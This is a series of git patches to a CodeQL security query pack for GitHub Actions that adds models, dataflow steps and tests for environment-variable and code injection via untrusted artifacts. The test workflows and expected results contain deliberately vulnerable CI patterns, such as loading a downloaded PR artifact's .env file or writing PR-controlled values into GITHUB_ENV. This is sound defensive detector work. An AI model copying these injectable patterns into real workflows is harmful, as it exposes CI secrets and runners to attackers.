["pietrobolcato/action-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["rexdefuror/read-package-json", "*", "artifact", "env.*", "taint", "manual"] + - ["BrycensRanch/read-properties-action", "*", "artifact", "output.*", "taint", "manual"] + - ["kurt-code/gha-properties", "*", "artifact", "output.*", "taint", "manual"] + - ["SebRollen/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["simonblund/version-reader", "*", "artifact", "output.version", "taint", "manual"] + - ["mindsers/changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["nichmor/minimal-read-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] + - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] + - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml index 633c45661e5..4a2b9b50eb6 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml @@ -19,5 +19,5 @@ jobs: with: path: ./artifact.txt - name: Use artifact - run: echo ${{ steps.artifact.outputs.contents }} + run: echo ${{ steps.artifact.outputs.content }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 370241c7ac0..2e0f79da4a0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -9,6 +9,8 @@ edges | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$( Date: Fri, 12 Jul 2024 12:43:25 +0200 Subject: [PATCH 0407/1267] feat(models): Add dotenv models Envvar-injection sinks --- ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml | 6 ++++++ ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/akefirad_loadenv-action.model.yml | 7 +++++++ ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml | 6 ++++++ ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml | 6 ++++++ .../manual/luizfelipelaviola_parse-plain-dotenv.model.yml | 6 ++++++ ql/lib/ext/manual/read-file-actions.model.yml | 4 ++++ ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 6 ++++++ 8 files changed, 47 insertions(+) create mode 100644 ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml create mode 100644 ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml create mode 100644 ql/lib/ext/manual/akefirad_loadenv-action.model.yml create mode 100644 ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml create mode 100644 ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml create mode 100644 ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml create mode 100644 ql/lib/ext/manual/xom9ikk_dotenv.model.yml diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml new file mode 100644 index 00000000000..ad7fb8a538c --- /dev/null +++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml new file mode 100644 index 00000000000..cf23452f7a9 --- /dev/null +++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml new file mode 100644 index 00000000000..8f14138168c --- /dev/null +++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"] + diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml new file mode 100644 index 00000000000..264c3f7b242 --- /dev/null +++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml new file mode 100644 index 00000000000..f00774d1c4a --- /dev/null +++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml new file mode 100644 index 00000000000..c7474549fcb --- /dev/null +++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/read-file-actions.model.yml b/ql/lib/ext/manual/read-file-actions.model.yml index 1b9bd745a65..3d92eaef263 100644 --- a/ql/lib/ext/manual/read-file-actions.model.yml +++ b/ql/lib/ext/manual/read-file-actions.model.yml @@ -31,3 +31,7 @@ extensions: - ["miraai/read-helm-chart-yaml", "*", "artifact", "output.*", "taint", "manual"] - ["dangdennis/toml-action", "*", "artifact", "output.value", "taint", "manual"] - ["artlaman/conventional-changelog-reader-action", "*", "artifact", "output.*", "taint", "manual"] + - ["romanlamsal/dotenv-concat", "*", "artifact", "output.*", "taint", "manual"] + - ["sammcj/dotenv-output-action", "*", "artifact", "output.*", "taint", "manual"] + - ["c-py/action-dotenv-to-setenv", "*", "artifact", "output.*", "taint", "manual"] + - ["duskmoon314/action-load-env", "*", "artifact", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml new file mode 100644 index 00000000000..bfbd4e2f729 --- /dev/null +++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"] From 5785a21d5675e6fba491b6104c6402649cb99496 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:44:25 +0200 Subject: [PATCH 0408/1267] feat(queries): Env-var injection Enable Uses sinks for envvar injection --- .../codeql/actions/dataflow/ExternalFlow.qll | 20 +++++++++++-------- .../actions/security/EnvVarInjectionQuery.qll | 13 ++++++++++++ .../CWE-077/EnvVarInjectionCritical.ql | 6 +++++- .../Security/CWE-077/EnvVarInjectionMedium.ql | 6 +++++- 4 files changed, 35 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 9ddba387b51..2914dac5f0a 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -110,18 +110,22 @@ predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and - ( - if input.trim().matches("env.%") - then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() - ) and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() + ) and + // pred provenance + ( + input.trim().matches("env.%") and + sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + sink.asExpr() = uses ) ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f5a3b5f89a8..8dba1a21c90 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -45,6 +45,19 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } } +/** + * Holds if a 3rd party action declares an environment variable with contents from an untrusted file. + * e.g. + *- name: Load .env file + * uses: aarcangeli/load-dotenv@v1.0.0 + * with: + * path: 'backend/new' + * filenames: | + * .env + * .env.test + * quiet: false + * if-file-not-found: error + */ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 320feb4e133..89e1ddd3cc2 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink @@ -25,7 +26,10 @@ where not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index bccb61ae6ea..70c05fc1c95 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.EnvVarInjectionQuery +import codeql.actions.dataflow.ExternalFlow import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink @@ -25,7 +26,10 @@ where not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ( + sink.getNode() instanceof EnvVarInjectionFromFileReadSink or + madSink(sink.getNode(), "envvar-injection") + ) ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", From e0a075da57ce4dd67a658251af54731f04a3d0e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:06 +0200 Subject: [PATCH 0409/1267] feat(dataflow): Flow through bash assigments on artifact to GH env/output --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 82 +++++++++++++++++--- 1 file changed, 72 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 5e624798d69..3caf80b7ca8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -156,24 +156,72 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - value.regexpMatch([".*\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\).*"]) and + ( + // A file is read and its content is assigned to an env var + // - run: | + // foo=$(> "$GITHUB_ENV" + exists(string var_name, string line, string assignment_regexp, string file_read | + run.getScript().splitAt("\n") = line and + assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and + var_name = line.regexpCapture(assignment_regexp, 1) and + file_read = line.regexpCapture(assignment_regexp, 2) and + outputsPartialFileContent(file_read) and + envToRunExpr(var_name, run, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) + ) + or + // A file is read and its content is assigned to an output + // - run: echo "foo=$(> "$GITHUB_ENV" + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and + outputsPartialFileContent(value) + ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and @@ -185,7 +233,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ -predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { +predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(UntrustedArtifactDownloadStep download, Run run | pred.asExpr() = download and succ.asExpr() = run.getScriptScalar() and @@ -193,6 +241,18 @@ predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { ) } +/** + * A download artifact step followed by a envvar-injection uses step . + */ +predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Uses uses | + madSink(succ, "envvar-injection") and + pred.asExpr() = download and + succ.asExpr() = uses and + download.getAFollowingStep() = uses + ) +} + /** * A read of the _files field of the dorny/paths-filter action. */ @@ -254,7 +314,9 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node class TaintSteps extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) or - artifactDownloadToUseStep(node1, node2) or + artifactDownloadToRunStep(node1, node2) or + artifactDownloadToUsesStep(node1, node2) or + // 3rd party actions dornyPathsFilterTaintStep(node1, node2) or tjActionsChangedFilesTaintStep(node1, node2) or tjActionsVerifyChangedFilesTaintStep(node1, node2) or From a1787596d242dc4c20392ff4805f25e932e563e2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 12:45:19 +0200 Subject: [PATCH 0410/1267] feat(tests): Update tests --- ql/test/library-tests/test.expected | 31 +++++++++++++++++++ .../CWE-077/.github/workflows/test7.yml | 25 +++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 +++ .../CWE-077/EnvVarInjectionMedium.expected | 3 ++ .../CWE-094/CodeInjectionCritical.expected | 16 ++++++++++ .../CWE-094/CodeInjectionMedium.expected | 14 +++++++++ 6 files changed, 93 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 62b04344f39..0139efb0f83 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1083,10 +1083,16 @@ sources | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | | apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | @@ -1100,23 +1106,30 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | | aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | | cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | | drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | | drawpile/drawpile | * | input.path | output.path | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | | element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | | envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | | flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | | getsentry/action-release | * | input.version | output.version | taint | manual | | getsentry/action-release | * | input.version_prefix | output.version | taint | manual | @@ -1124,6 +1137,7 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | | hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | | hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | @@ -1137,31 +1151,47 @@ summaries | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | | hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | | jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | | kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | | linkerd/linkerd2 | * | input.component | output.image | taint | manual | | linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | | linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | | mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | | neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | | novuhq/novu | * | input.docker_name | output.image | taint | manual | | philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | | streetsidesoftware/cspell | * | input.value | output.value | taint | manual | | streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | @@ -1169,6 +1199,7 @@ summaries | tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml new file mode 100644 index 00000000000..c33c90dbb9c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -0,0 +1,25 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Load .env file + uses: aarcangeli/load-dotenv@v1.0.0 + with: + path: 'backend/new' + filenames: | + .env + .env.test + quiet: false + if-file-not-found: error + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9c2fd6faf46..02aed1c05cb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -14,6 +14,7 @@ edges | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -45,6 +46,8 @@ nodes | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -62,3 +65,4 @@ subpaths | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo 